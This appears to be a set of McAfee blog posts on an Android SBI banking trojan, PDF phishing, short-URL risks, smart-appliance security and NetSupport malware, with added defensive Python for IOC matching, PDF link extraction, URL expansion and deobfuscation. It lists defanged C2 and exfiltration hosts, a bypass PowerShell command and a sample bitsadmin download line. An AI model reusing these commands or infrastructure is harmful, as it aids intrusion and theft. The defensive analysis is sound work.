This blog explores the insidious tactics, alarming trends, and preventive measures against the rising tide of phishing attacks plaguing Android users in India’s financial landscape.
A sense of urgency is created by warning users that their account will be blocked unless they install the APK and provide the information needed to complete the KYC form.
These seemingly innocent prompts, meticulously crafted by cybercriminals, possess a cunning sophistication that mirrors the legitimate communication channels of banking institutions. They prey upon human curiosity, fear, and desire, tricking users into taking immediate actions that, at first glance, seem innocuous but have far-reaching consequences.
Since the app installer is launched from WhatsApp, Android blocks the installation by default unless the user has previously allowed installation of unknown apps from this source.
A warning is displayed after tapping on the APK icon:
However, if users ignore the warning, they can disable this important security feature with just two taps:
Android now warns about the risk of allowing unknown apps to be installed from WhatsApp. Many users nevertheless allow this option, which poses a high risk of infection.
Once the trojan is installed, the victim sees the financial institution's icon in their Android app list:
After installation, it abuses the icon of the State Bank of India (SBI) to confuse the user.
On first launch, it asks for SMS-related permissions.
The application's landing page mimics the real SBI net banking page.
This phishing page is loaded locally from the malware into a WebView.
The application asks for the user’s username, password, and phone number.
The captcha shown here is static and never changes, because all of the content is hardcoded locally.
As part of the KYC validation lure process, the malware collects sensitive user information such as:
After the victim enters all the information, a fake KYC validation code is displayed, making the procedure look genuine so the user does not become suspicious of the app or the process.
Additionally, this banking trojan intercepts SMS messages and abuses Firebase to communicate with the attackers. During the analysis, the malware transmitted all collected information, including credit card data, to:
wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb
According to static analysis, any received SMS message is also exfiltrated to the attackers' servers over the open socket connection, since the user granted SMS-reading permission at first launch. This is how the malware extracts any OTP required to complete the victim's transactions.
The local static site loaded by the malware is built on the Cordova framework. The credit card details it collects, along with all other collected information, are transmitted to the attackers through Firebase, a legitimate service that criminals also abuse.
Android/Banker.AXF!ML infections around the world: India is the target.
Banking trojans are neither new nor sophisticated, but they remain a persistent threat because they are a lucrative business for malware authors, who can lure many victims unaware of the risks of phishing. Since these campaigns can be massive, criminals can collect a large haul even if only a small percentage of targets fall for them.
Cybercriminals are constantly refining their social engineering tricks to lure users into phishing and malware. User awareness is the first line of defense against these threats. Some general advice:
McAfee Antivirus emerges as a formidable ally in the battle against Android phishing within India’s banking sector. With its robust suite of security features tailored for mobile devices, McAfee stands as a bulwark, providing critical defense mechanisms against the ever-mutating landscape of cyber threats.
Hash | Package |
7cfc6360e69d22b09a28c940caf628959d11176e27b8a03e15b020b369569415 | hello.uwer.hello.hello.google.is.the.best |
b067f5903e23288842ad056d4b31299b3b30052abe69bee236136b2b9fcab6a8 | hello.uwer.hello.hello.google.is.the.best |
e2e097ef433be75dcab830baa4b08feb4a24267c46b568fd4aef00dbb081ed8f | hello.uwer.hello.hello.google.is.the.best |
9f046f769760d52a97680a91fd511f1e86c428b9eec27d7eb486b7b4d0666f0b | hello.uwer.hello.hello.google.is.the.best |
1c69b0a69ed1631a1f1b54627a9b5dac3b214a275280de36d05ee75021cbfb04 | hello.uwer.hello.hello.google.is.the.best |
495ab4efd3d1ec9bfc2d08d80df316aad20dc76e625374627fabea06f5151584 | hello.uwer.hello.hello.google.is.the.best |
6190144b56e06af8aeeeba2104a665a555d01f6ec2a22ba78212d943ac2b258d | hello.uwer.hello.hello.google.is.the.best |
6c6ea9fbeae967fb53ab9984edda9b754fb6d3f85b4ff5b14e1fd33399362ba4 | hello.uwer.hello.hello.google.is.the.best |
Abused Firebase host: wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb
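The indicators in this post and in the Remcos write-up above are defanged (hxxp, [.], [:]) so that they cannot be clicked by accident, which also means they do not match raw log data as written. The following Python is an added example (not McAfee's tooling) that refangs the indicators, extracts the host from each, and matches on host tokens rather than substrings against proxy, DNS and netflow lines; the log lines are constructed for the demo, and the IOC values are the ones listed on this page.

```python
import re
from urllib.parse import urlsplit

DEFANG_RULES = (
    (re.compile(r"^hxxp", re.IGNORECASE), "http"),      # hxxp:// and hxxps://
    (re.compile(r"\[:\]//"), "://"),                     # wss[:]//, http[:]//
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}"), "."),
    (re.compile(r"\[@\]"), "@"),
)


def refang(ioc: str) -> str:
    """Undo common defanging and lower-case the scheme so variants compare equal."""
    s = ioc.strip()
    for pattern, replacement in DEFANG_RULES:
        s = pattern.sub(replacement, s)
    if "://" in s:
        scheme, rest = s.split("://", 1)
        s = scheme.lower() + "://" + rest
    return s


def ioc_host(ioc: str) -> str:
    """Host part of a URL indicator; bare IPs and domains are returned as-is."""
    s = refang(ioc)
    if "://" in s:
        return (urlsplit(s).hostname or "").lower()
    return s.lower()


TOKEN_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]*")   # host-like tokens in a log line


def match_logs(iocs, lines) -> list:
    """Return (line_number, host, original_ioc) for lines whose host tokens
    match an indicator. Exact token matching avoids 1.2.3.4 hitting 11.2.3.45."""
    hosts = {}
    for ioc in iocs:
        hosts.setdefault(ioc_host(ioc), ioc)
    hits = []
    for number, line in enumerate(lines, 1):
        tokens = {t.lower().rstrip(".") for t in TOKEN_RE.findall(line)}
        for host, original in hosts.items():
            if host in tokens:
                hits.append((number, host, original))
                break
    return hits


# Network indicators from the two write-ups, as published (defanged).
NETWORK_IOCS = [
    "hxxp://103.176.111[.]163/mundhul.pfb",
    "hxxp://103.176.111[.]163/lnHxQotdQb132.bin",
    "103.176.111[.]163",
    "94.156.65[.]197",
    "Wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb",
]

# Constructed log lines for the demo.
SAMPLE_LOG = [
    "2024-01-10T09:12:01Z proxy GET http://103.176.111.163/lnHxQotdQb132.bin 200",
    "2024-01-10T09:12:05Z dns query s-usc1a-nss-2003.firebaseio.com A",
    "2024-01-10T09:13:44Z proxy GET https://www.example.com/ 200",
    "2024-01-10T09:14:02Z netflow 10.0.0.5:51234 -> 94.156.65.197:2404 SYN",
]

if __name__ == "__main__":
    for number, host, ioc in match_logs(NETWORK_IOCS, SAMPLE_LOG):
        print(f"line {number}: {host}  (IOC: {ioc})")
```

Matching on the host deliberately flags any path on a known C2 host, not only the exact URLs observed, because the download path can change between campaigns while the infrastructure stays the same.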
The post Shielding Against Android Phishing in Indian Banking appeared first on McAfee Blog.
By Lakshya Mathur & Yashvi Shah
Phishing attackers aim to deceive individuals into revealing sensitive information for financial gain, credential theft, corporate network access, and spreading malware. This method often involves social engineering tactics, exploiting psychological factors to manipulate victims into compromising actions that can have profound consequences for personal and organizational security.
Over the last four months, McAfee Labs has observed a rising trend in the utilization of PDF documents for conducting a succession of phishing campaigns. These PDFs were delivered as email attachments.
Attackers favor using PDFs for phishing due to the file format’s widespread trustworthiness. PDFs, commonly seen as legitimate documents, provide a versatile platform for embedding malicious links, content, or exploits. By leveraging social engineering and exploiting the familiarity users have with PDF attachments, attackers increase the likelihood of successful phishing campaigns. Additionally, PDFs offer a means to bypass email filters that may focus on detecting threats in other file formats.
The observed phishing campaigns using PDFs were diverse, abusing various brands such as Amazon and Apple. Attackers often impersonate well-known and trusted entities, increasing the chances of luring users into interacting with the malicious content. Additionally, we will delve into distinct types of URLs utilized by attackers. By understanding the themes and URL patterns, readers can enhance their awareness and better recognize potential phishing attempts.
Figure 1 – PDF phishing geo heatmap showing McAfee customers targeted in the last month
Attackers employ a range of corporate themes in their social engineering tactics to entice victims into clicking on phishing links. Notable brands such as Amazon, Apple, Netflix, and PayPal, among others, are often mimicked. The PDFs are carefully crafted to induce a sense of urgency in the victim’s mind, utilizing phrases like “your account needs to be updated” or “your ID has expired.” These tactics aim to manipulate individuals into taking prompt action, contributing to the success of the phishing campaigns.
Below are some of the examples:
Figure 2 – Fake Amazon PDF Phish
Figure 3 – Fake Apple PDF Phish
Figure 4 – Fake Internal Revenue Service PDF Phish
Figure 5 – Fake Adobe PDF Phish
Below are the stats on the volume of various themes we have seen in these phishing campaigns.
Figure 6 – Campaign statistics by theme, based on McAfee customer hits in the last month
Cyber attackers are exploiting the popular professional networking platform LinkedIn and leveraging Google Apps Script to redirect users to phishing websites. Let us examine each method of abuse individually.
In the case of LinkedIn, attackers use Smart Links to get past antivirus and other security controls. Smart Links are a feature of the LinkedIn Sales Navigator service, designed for tracking and marketing to business accounts.
Figure 7 – LinkedIn Smart link redirecting to an external website
By employing these smart links, attackers redirect their victims to phishing pages. This strategic approach allows them to bypass traditional protection measures, as the use of LinkedIn as a referrer adds an element of legitimacy, making it more challenging for security systems to detect and block malicious activity.
In addition to exploiting LinkedIn, attackers are leveraging the functionality of Google Apps Script to redirect users to phishing pages. Google Apps Script serves as a JavaScript-based development platform used for creating web applications and various other functionalities. Attackers embed malicious or phishing code within this platform, and when victims access the associated URLs, it triggers the display of phishing or malicious pages.
Figure 8 – Amazon fake page displayed on accessing Google script URL
As shown in Figure 8, when victims click on the “Continue” button, they are subsequently redirected to a phishing website.
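Both redirector abuses described above leave a trace inside the PDF itself: the link annotation's /URI action points at the LinkedIn or Google Apps Script redirector rather than at the final phishing page. The following Python is an added example (not McAfee's tooling) that pulls every /URI target out of a PDF, including those stored in FlateDecode object streams (which is where PDF 1.5+ writers put annotations, so a plain string search misses them), and flags the two redirector patterns. Assumptions: the Smart Link pattern (linkedin.com/slink?code=) and the Apps Script web-app pattern (script.google.com/macros/s/<id>/exec) are the public URL shapes of those services, not values from the observed campaigns; encrypted PDFs and non-Flate filters are out of scope; the sample PDF is constructed inline.

```python
import re
import zlib

# /URI (literal string) with backslash escapes; the stream regex skips "endstream".
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)

SUSPICIOUS = {
    "linkedin-smart-link": re.compile(r"^https?://(www\.)?linkedin\.com/slink\?code=", re.I),
    "google-apps-script": re.compile(r"^https?://script\.google\.com/macros/s/[^/]+/exec", re.I),
}


def unescape_pdf_string(raw: bytes) -> str:
    """PDF literal strings escape ( ) and \\ with a backslash."""
    return re.sub(rb"\\(.)", rb"\1", raw).decode("latin-1")


def extract_uris(pdf: bytes) -> list:
    """Every /URI target found in the raw file and in each inflatable stream,
    in document order, without duplicates."""
    chunks = [pdf]
    for m in STREAM_RE.finditer(pdf):
        try:
            chunks.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass                      # image data or a non-Flate filter
    found = []
    for chunk in chunks:
        for m in URI_RE.finditer(chunk):
            uri = unescape_pdf_string(m.group(1))
            if uri not in found:
                found.append(uri)
    return found


def classify(uri: str) -> str:
    for label, pattern in SUSPICIOUS.items():
        if pattern.search(uri):
            return label
    return "other"


def scan_pdf(pdf: bytes) -> list:
    """[(uri, label)] for every clickable link in the document."""
    return [(u, classify(u)) for u in extract_uris(pdf)]


def build_sample_pdf() -> bytes:
    """Constructed three-link PDF: one plain link object plus two links inside a
    FlateDecode object stream, one of them with an escaped ')' in the URI."""
    link1 = b"<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://www.linkedin.com/slink?code=abc123) >> >>"
    link2 = b"<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://script.google.com/macros/s/AKfycb_example/exec) >> >>"
    link3 = b"<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://www.example.com/legit\\)page) >> >>"
    objstm = zlib.compress(b"5 0 6 0\n" + link2 + b"\n" + link3)
    return (b"%PDF-1.5\n1 0 obj " + link1 + b" endobj\n"
            b"2 0 obj << /Type /ObjStm /N 2 /First 8 /Filter /FlateDecode /Length "
            + str(len(objstm)).encode() + b" >>\nstream\n" + objstm + b"\nendstream\nendobj\n%%EOF\n")


SAMPLE_PDF = build_sample_pdf()

if __name__ == "__main__":
    for uri, label in scan_pdf(SAMPLE_PDF):
        print(f"{label:20s} {uri}")
```

Because the redirector URLs are legitimate services, blocking them outright is rarely an option; the practical use of this output is to expand the redirector (a HEAD request that does not follow redirects) and reputation-check the destination before the attachment reaches a user.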
Crafting convincing PDFs that mimic legitimate companies has become easy for attackers. These PDFs create a sense of urgency through social engineering, prompting unsuspecting customers to click embedded phishing links; those who take the bait are redirected to phishing websites that request sensitive information. The tactic is deployed globally, with such PDFs sent to thousands of customers. Over the past four months we have seen the use of PDFs in phishing campaigns increase, with attackers adopting themes such as Amazon and Apple to exploit user trust, leveraging LinkedIn Smart Links to redirect victims while evading traditional security controls, and exploiting Google Apps Script to host code that sends users to deceptive websites.
Protecting oneself from phishing requires a combination of awareness, caution, and security practices. Here are some key steps to help safeguard against phishing:
McAfee provides coverage against a broad spectrum of active phishing campaigns, offering protection through features such as real-time scanning and URL filtering. While it enhances security against various phishing attempts, users must remain vigilant and adopt responsible online practices along with using McAfee.
The post PDF Phishing: Beyond the Bait appeared first on McAfee Blog.
Short-URL services have emerged as a crucial part of the way we use the Internet. With the increasing use of social media, where the number of characters is limited, short-URL services are a useful tool for reducing a URL’s length. However, this convenience also comes with a potential risk. The anonymity provided by these services can serve as a breeding ground for online threats. This article delves deeper into the potential risks associated with using short-URL services and how you can safeguard yourself from these threats.
Short-URL services are online tools that convert a long URL into a short one. These services are often free and easy to use: you simply enter the long URL you wish to shorten and the service generates a short URL for you. This is particularly handy on social media platforms such as Twitter, where character limits make sharing long URLs impractical.
The short URL does not provide any clues about the destination website – it is a random mix of letters and numbers. This lack of transparency can make it difficult for users to determine the legitimacy of the link before clicking it. Consequently, this has opened a pandora’s box for cyber threats, as ill-intentioned individuals can hide malicious links behind these short URLs.
While the brevity provided by short-URL services is a practical solution in the age of character-limited social media posts, it’s important to understand the accompanying risks. With the shortened URL, the original URL is hidden, which can make it challenging for users to discern whether the link is safe or not. This very feature is exploited by cybercriminals who mask malicious sites with short URLs, intending to trick users into visiting harmful web pages.
Phishing attacks, malware, and other types of online fraud can be hidden behind short URLs. Usually, these URLs are distributed via emails, social media, and instant messaging applications. Once clicked, these malicious links can infect a user’s device with malware or lead them to fake websites where sensitive information is collected. This manipulative tactic is known as ‘spoofing’.
→ Dig Deeper: New Malicious Clicker found in apps installed by 20M+ users
The practice of using short URLs has brought about an increased level of vulnerability in cyberspace. Certain security features that help in identifying a malicious website, such as examining the URL structure or the SSL certificate, are effectively nullified by the use of short URLs. As a result, even experienced internet users can fall prey to these malicious tactics. This marks a significant shift in traditional cybersecurity threats, where the danger is now hidden behind the veil of convenience.
→ Dig Deeper: “This Connection Is Not Private” – What it Means and How to Protect Your Privacy
Even more concerning is the fact that once a short URL is generated, it remains active indefinitely. This means a malicious link can continue to exist and pose a threat long after the original malicious activity has been detected and dealt with. Given the scale at which these short URLs are generated and shared across various digital platforms, the potential for harm is vast and hard to contain.
Given the opacity provided by short-URL services, they have become a popular tool among cybercriminals. A report by the cybersecurity firm Symantec found that 87% of the malicious URLs used in massive cyber-attacks were actually short URLs. This stark statistic illustrates the size of the problem at hand and the urgent need for adequate measures to tackle it.
Short URLs are like a wolf in sheep’s clothing. They appear harmless, but the reality could be contrary. Without the ability to inspect the actual URL, users can unknowingly fall into a trap set by online fraudsters. The success of these threats relies heavily on the victim’s ignorance and the inability to determine the authenticity of the link they are clicking on.
To fully comprehend the risks associated with short URLs, let’s examine a few real-life cases where short URLs were used to spread cyber threats. In one instance, a malicious short URL was used to propagate a Facebook scam that promised users a free gift card if they clicked on the link. Instead of a gift card, the link led users to a phishing site designed to steal personal information.
→ Dig Deeper: Don’t Take a Bite out of that Apple Gift Card Scam
In another instance, an email campaign used a short URL to spread the notorious Locky ransomware. The email contained an invoice with a short URL which, when clicked, downloaded the ransomware onto the user’s device. These two cases underscore the severe risks associated with short URLs and highlight the importance of exercising caution when dealing with such links.
While the threats presented by short URLs are real and potentially damaging, internet users are not entirely helpless against them. There are certain measures that can be taken to avoid falling victim to these threats. Below are some of the ways to ensure safe browsing habits:
Firstly, be wary of any strange or unexpected links, even if they come from trusted sources. Cybercriminals often disguise malicious links to appear as though they are from trusted sources, in a tactic known as ‘spoofing’. However, if an email or a message seems out of character or too good to be true, it’s best to avoid clicking on the link.
Secondly, consider using URL expansion services. These services allow you to enter a shortened URL and then reveal the full URL, enabling you to see where the link will take you before you click on it. This can provide an added layer of security when dealing with unfamiliar links.
Finally, keep your devices and internet security software up to date. This is a simple but effective measure against all forms of online threats, including those hidden in short URLs. By regularly updating your devices and software, you can ensure you have the most recent security patches and protections available.
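The expansion step described above, as an added example that is not part of the original post: it models what a URL expansion service does, following each 3xx redirect without fetching any page body, recording every hop, capping the hop count so a redirect loop cannot hang the checker, and reporting the final host so it can be judged before anyone clicks. The network is replaced by a constructed redirect table (all URLs below are made up) so the code runs offline; `fake_head` is the assumed hook you would swap for a real HEAD request such as `requests.head(url, allow_redirects=False)`.

```python
"""Expand a shortened URL hop by hop without fetching page bodies."""
from urllib.parse import urljoin, urlparse

# Constructed redirect table standing in for live HTTP HEAD responses.
# Each entry: url -> (status code, Location header or None).
FAKE_RESPONSES = {
    "https://sho.rt/a1b2c3": (301, "https://track.example/r?id=7"),
    "https://track.example/r?id=7": (302, "/landing"),          # relative Location
    "https://track.example/landing": (302, "https://login-secure-example.test/verify"),
    "https://login-secure-example.test/verify": (200, None),    # final page
    # Self-referential redirect to exercise the loop check.
    "https://sho.rt/loop": (302, "https://sho.rt/loop"),
}

REDIRECT_CODES = (301, 302, 303, 307, 308)


def fake_head(url):
    """Stand-in for an HTTP HEAD request; unknown URLs behave like a 404."""
    return FAKE_RESPONSES.get(url, (404, None))


def expand_url(url, head=fake_head, max_hops=10):
    """Follow redirects and return (final_url, hops, reason).

    reason is 'ok' when a non-redirect response was reached, 'loop' when a
    URL repeats, or 'too_many_hops' when the cap is hit before a final page.
    """
    hops = [url]
    seen = {url}
    current = url
    for _ in range(max_hops):
        status, location = head(current)
        if status not in REDIRECT_CODES or not location:
            return current, hops, "ok"
        # Location may be relative; resolve it against the current URL.
        nxt = urljoin(current, location)
        if nxt in seen:
            hops.append(nxt)
            return nxt, hops, "loop"
        seen.add(nxt)
        hops.append(nxt)
        current = nxt
    return current, hops, "too_many_hops"


def final_host(url, **kwargs):
    """The host the user would actually land on after all redirects."""
    final, _, _ = expand_url(url, **kwargs)
    return urlparse(final).hostname


if __name__ == "__main__":
    final, hops, reason = expand_url("https://sho.rt/a1b2c3")
    print(reason, "->", final)
    for i, hop in enumerate(hops):
        print(f"  hop {i}: {hop}")
```

Because only the redirect chain is followed and no body is downloaded, the final host can be compared against what the message claimed before the link is ever opened in a browser.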
McAfee Pro Tip: Enhance your online safety and privacy by employing a secure browser. A safe browser incorporates additional security features designed to thwart unauthorized third-party activities during your web surfing sessions. Know more about safe browsing.
While individual users can take steps to protect themselves, institutions also have a role to play in mitigating the threats associated with short URLs. Social media platforms, email providers and companies should all be invested in protecting their users from cyber threats. Implementing stricter URL policies, improving spam filters, and educating users about potential dangers can all help in reducing the risk.
Internet service providers can also have a hand in safeguarding users. For instance, they could monitor and block suspicious short URLs, or provide warnings to users about potential threats. While these measures may not completely eliminate the risk, they can greatly reduce the chances of users falling victim to cyber threats.
Moreover, there’s a growing need for regulatory policies around the usage and creation of short URLs. Instituting thorough checks before a short URL is generated could help in curbing the misuse of these services. Such checks could include verifying the authenticity of the original URL and scanning for potential threats.
Short-URL services undeniably offer a degree of convenience in this age of Twitter-length posts and character-limited updates. However, the potential threats that lurk behind these shortened links cannot be overlooked. Users and institutions need to balance the benefits of these services with the risks, and take appropriate measures to safeguard against potential threats.
While we cannot completely eliminate the risks associated with short URLs, by staying informed, exercising caution, and using tools and resources at our disposal, we can significantly reduce our vulnerability to these threats. In the end, it’s about promoting a safer Internet experience for everyone, where convenience doesn’t come at the cost of security.
Stay informed about the latest online threats plaguing the community today. Explore the insights provided by McAfee to arm yourself with the knowledge needed to protect against evolving cybersecurity challenges.
The post Short-URL Services May Hide Threats appeared first on McAfee Blog.
Smart technology has been on the rise, with internet-connected devices becoming increasingly common in our homes. From smart speakers to smart fridges, these devices are designed to make our lives easier and more efficient. However, they also raise new concerns about privacy and security. One device that has been gaining popularity is the smart coffee maker. While it may seem harmless, there are potential risks associated with this seemingly innocuous device.
A smart coffee maker, like other smart appliances, connects to your home network, offering convenience features such as scheduling brew times, remote start, and customization of your coffee preferences. However, this connectivity also opens the door to potential cybersecurity threats. If not properly managed, your smart coffee maker could be brewing up more than just your morning pick-me-up.
The central issue lies in the connectivity of these smart coffee makers. Just like your computer or smartphone, any device that connects to the internet can potentially be hacked. This may result in theft of personal information, disruption of your network, or even malicious use of the device itself. And while a hacked coffee maker might not seem like a big deal, it could be used as a gateway to access other, more sensitive devices on your network.
Many people may not even realize that their smart coffee maker poses a security risk. After all, it doesn’t store personal data like a phone or computer does. However, once it’s connected to your network, it becomes a potential entry point for hackers. And because it’s a relatively new type of device, it might not have the same level of security measures that more well-established smart devices have.
Another serious concern with smart coffee makers and similar devices is privacy. Some smart appliances have microphones, cameras, or other sensors that can monitor your habits and collect data. This data can potentially be sold to advertisers or used for other less-than-ethical purposes.
→ Dig Deeper: What Personal Data Do Companies Track?
Even if your smart coffee maker doesn’t have these features, it still collects data about your coffee habits, such as when you usually make coffee and how much you make. This information, while not as sensitive as personal or financial data, could still be valuable to advertisers and other third parties.
While it might seem far-fetched, hackers can cause a lot of trouble with a compromised coffee maker. One obvious issue is simple annoyance or disruption. A hacker could, for example, repeatedly start the brew cycle at odd hours, wasting coffee and creating a mess. But the potential problems go beyond simple pranks.
A more serious concern is that a hacker could use the coffee maker as a stepping stone to infiltrate the rest of your network. This could potentially give them access to sensitive data stored on other devices, such as personal documents on your computer or personal information stored on your phone. In some cases, they could even take control of other smart devices connected to your network.
The good news is that there are steps you can take to secure your smart coffee maker and other connected devices:
→ McAfee Pro Tip: Be cautious when downloading apps, especially third-party ones. Certain applications might contain malware or viruses that pose a threat to your device’s security.
While consumers have a responsibility to use their devices securely, manufacturers also have a role to play in improving the security of smart appliances. They can, for instance, design devices with security in mind from the outset. This could involve using secure coding practices and running through security tests before releasing a product. Manufacturers can also provide timely updates and clear instructions on how to apply them.
Manufacturers should also be transparent about what data their devices collect and how it’s used. If a device collects data, the manufacturer should provide clear information about this in the product’s privacy policy. They should also give users the ability to opt out of data collection if they choose.
→ Dig Deeper: The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers
Smart coffee makers, like all connected devices, come with potential security and privacy risks. However, the convenience and efficiencies they offer can make them an attractive addition to your home. With a combination of diligent security practices on the part of the user and responsible design and transparency from manufacturers, these risks can be managed.
Despite the potential issues, this doesn’t mean you should be afraid to use a smart coffee maker or other smart devices. Instead, be aware of the risks and take proactive steps to protect yourself and your data. Whether it’s changing the default password, regularly updating the firmware, or researching before buying, these simple steps can go a long way toward safeguarding your smart home. After all, a warm cup of coffee in the morning should be a comfort, not a cause for concern.
The post Your Smart Coffee Maker is Brewing Up Trouble appeared first on McAfee Blog.
NetSupport malware variants have been a persistent threat, demonstrating adaptability and evolving infection techniques. In this technical analysis, we delve into the infection chain, technical intricacies, and IOCs (Indicators of Compromise) of distinct NetSupport variants.
The following is a heatmap depicting the current prevalence of NetSupport in the field. This malware is spreading across the United States and Canada, signifying its geographical reach.
Figure 1: NetSupport Heat Map
McAfee Labs recently identified a new variation of NetSupport malware, which was distributed through JavaScript, highlighting the evolving tactics employed by cybercriminals.
Infection Chain
Figure 2: Infection Chain
This variant starts with a very long JS file and follows an intricate infection chain built on PowerShell commands. Key steps include changing the directory to the user’s AppData folder, setting variables, downloading files, and finally executing ‘client32.exe’. This executable establishes control over the compromised system and registers itself for auto-start through the Windows Registry; the ‘client32.exe’ binary is placed in the ‘MsEdgeSandbox’ folder under AppData, providing persistence.
The JS code looks as shown in the picture below. Attackers use obfuscated JavaScript files as the starting point of the infection chain; these files are designed to bypass security mechanisms and initiate delivery of the malicious payloads.
Figure 3: Encoded JavaScript File
It contains a long list of string literals, each made up of random characters and sequences of letters. These strings are used for various purposes in the code, such as constructing URLs or setting values for variables. The code defines several variables (hy, hY, hE, hi) and a function named ‘y’.
Figure 4: Encoded JavaScript File
Figure 5: Encoded JavaScript File
Figure 6: Encoded JavaScript File
The script shown in the AMSI buffer dumps in Figure 7 begins by changing the directory to the user’s AppData folder. It then sets up variables and proceeds to download and execute files; if certain commands are unavailable, it falls back to ‘bitsadmin’ for the downloads. The script ensures persistence by altering directory attributes, launching ‘client32.exe’, and adding a Windows Registry entry for automatic execution.
Figure 7: AMSI Dump
Figure 8: Code block
Figure 9: Code block
Figure 10: Code block
Figure 11: Code block
Variant 2 shares a similar infection chain with Variant 1: it starts with different but likewise obfuscated JavaScript files and then invokes PowerShell. What sets Variant 2 apart is how it manipulates files and content. It downloads a text file from a website, decodes the base64-encoded data, and creates a ZIP file with potentially malicious content. It also differs in file placement: instead of putting ‘client32.exe’ in the ‘MsEdgeSandbox’ folder like Variant 1, it establishes ‘client32.exe’ in a folder labeled ‘D’ under AppData.
The JS file shown in Figure 12 includes two variables, ‘F4f’ and ‘EQGMUD’. ‘F4f’ is set to a specific value, 140743580. ‘EQGMUD’ is more complex: it is a string formed by converting numerical values into characters, where the values are derived by subtracting ‘F4f’ (140743580) from them. Finally, the ‘eval’ function runs the code stored in ‘EQGMUD’ as JavaScript, executing the string as a script.
Figure 12: Encoded JavaScript File
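The numeric-offset encoding just described can be undone statically, without ever calling eval. The following is an added example, not code from the original post or from the malware: it parses the `var F4f = <offset>;` declaration and each `String.fromCharCode(<n> - F4f, …)` call and performs the subtraction itself, so an analyst can read the payload. The sample script is a constructed, benign stand-in in the shape the analysis describes; the exact surrounding syntax is assumed, not taken from the page.

```python
"""Statically decode offset-encoded String.fromCharCode() payloads."""
import re

# Constructed sample (benign payload) in the shape the analysis describes:
# every character code is written as a large number minus the offset F4f.
SAMPLE_JS = """
var F4f = 140743580;
var EQGMUD = String.fromCharCode(140743679-F4f,140743691-F4f,140743690-F4f,
140743695-F4f,140743691-F4f,140743688-F4f,140743681-F4f,140743626-F4f,
140743688-F4f,140743691-F4f,140743683-F4f,140743620-F4f,140743614-F4f,
140743680-F4f,140743681-F4f,140743679-F4f,140743691-F4f,140743680-F4f,
140743681-F4f,140743680-F4f,140743614-F4f,140743621-F4f,140743639-F4f);
eval(EQGMUD);
"""

OFFSET_RE = re.compile(r"var\s+(\w+)\s*=\s*(\d+)\s*;")
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([^)]*)\)")
# One argument: a number, optionally followed by "- <offset variable>".
TERM_RE = re.compile(r"^\s*(\d+)\s*(?:-\s*(\w+))?\s*$")


def find_offsets(js):
    """Return {name: int} for every `var NAME = <digits>;` declaration."""
    return {name: int(val) for name, val in OFFSET_RE.findall(js)}


def decode_fromcharcode(js):
    """Decode each String.fromCharCode(...) call in the source.

    Terms of the form `<n> - <var>` have the declared value of <var>
    subtracted; plain numeric terms are taken as-is. Returns one decoded
    string per call, in source order.
    """
    offsets = find_offsets(js)
    decoded = []
    for arglist in FROMCHARCODE_RE.findall(js):
        chars = []
        for term in arglist.split(","):
            m = TERM_RE.match(term)
            if not m:
                raise ValueError(f"unexpected argument: {term.strip()!r}")
            value = int(m.group(1))
            if m.group(2):
                value -= offsets[m.group(2)]  # e.g. 140743679 - F4f -> 99 ('c')
            chars.append(chr(value))
        decoded.append("".join(chars))
    return decoded


def eval_sinks(js):
    """Names of variables passed directly to eval(), e.g. ['EQGMUD']."""
    return re.findall(r"\beval\(\s*(\w+)\s*\)", js)


if __name__ == "__main__":
    print("offsets:", find_offsets(SAMPLE_JS))
    for s in decode_fromcharcode(SAMPLE_JS):
        print("decoded:", s)
    print("eval sinks:", eval_sinks(SAMPLE_JS))
```

Recovering the string this way gives the second-stage PowerShell (or, here, the benign stand-in) as text for review, with nothing executed.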
The AMSI buffer dumps shown in Figure 13 contain PowerShell commands that perform several actions, including downloading a file from the internet, extracting it, and making changes to the Windows Registry.
Figure 13: AMSI Dump
Figure 14: Directory Created
Figure 15: Process Tree
Once the JavaScript file is executed, it launches wscript.exe, which in turn launches PowerShell with the following command.
powershell.exe -ExecutionPolicy Bypass -V
Figure 16: PowerShell Command
This runs PowerShell with the execution policy set to “Bypass”, which means PowerShell does not enforce any execution restrictions, so the script runs free of policy-related checks.
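The chain described above (wscript.exe spawning powershell.exe with -ExecutionPolicy Bypass, the bitsadmin download fallback, client32.exe launched from under AppData, and the Run-key entry for persistence) maps directly onto process-creation and registry telemetry. As an added example that is not part of the original analysis, the following scans constructed Sysmon-style events for those behaviours; the field names, paths and the sample events are assumed, and the rule names are my own.

```python
"""Flag NetSupport-style behaviours in process and registry telemetry."""
import re

# Constructed events; in practice these would come from Sysmon Event ID 1
# (process creation) and Event ID 13 (registry value set).
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -W Hidden -C <redacted>"},
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority normal "
                "hxxp://example.invalid/a.zip C:\\Users\\user\\AppData\\Roaming\\MsEdgeSandbox\\a.zip"},
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\user\AppData\Roaming\MsEdgeSandbox\client32.exe",
     "cmdline": "client32.exe"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MsEdgeSandbox",
     "value": r"C:\Users\user\AppData\Roaming\MsEdgeSandbox\client32.exe"},
    # Benign control: an administrator running a script from a normal location.
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
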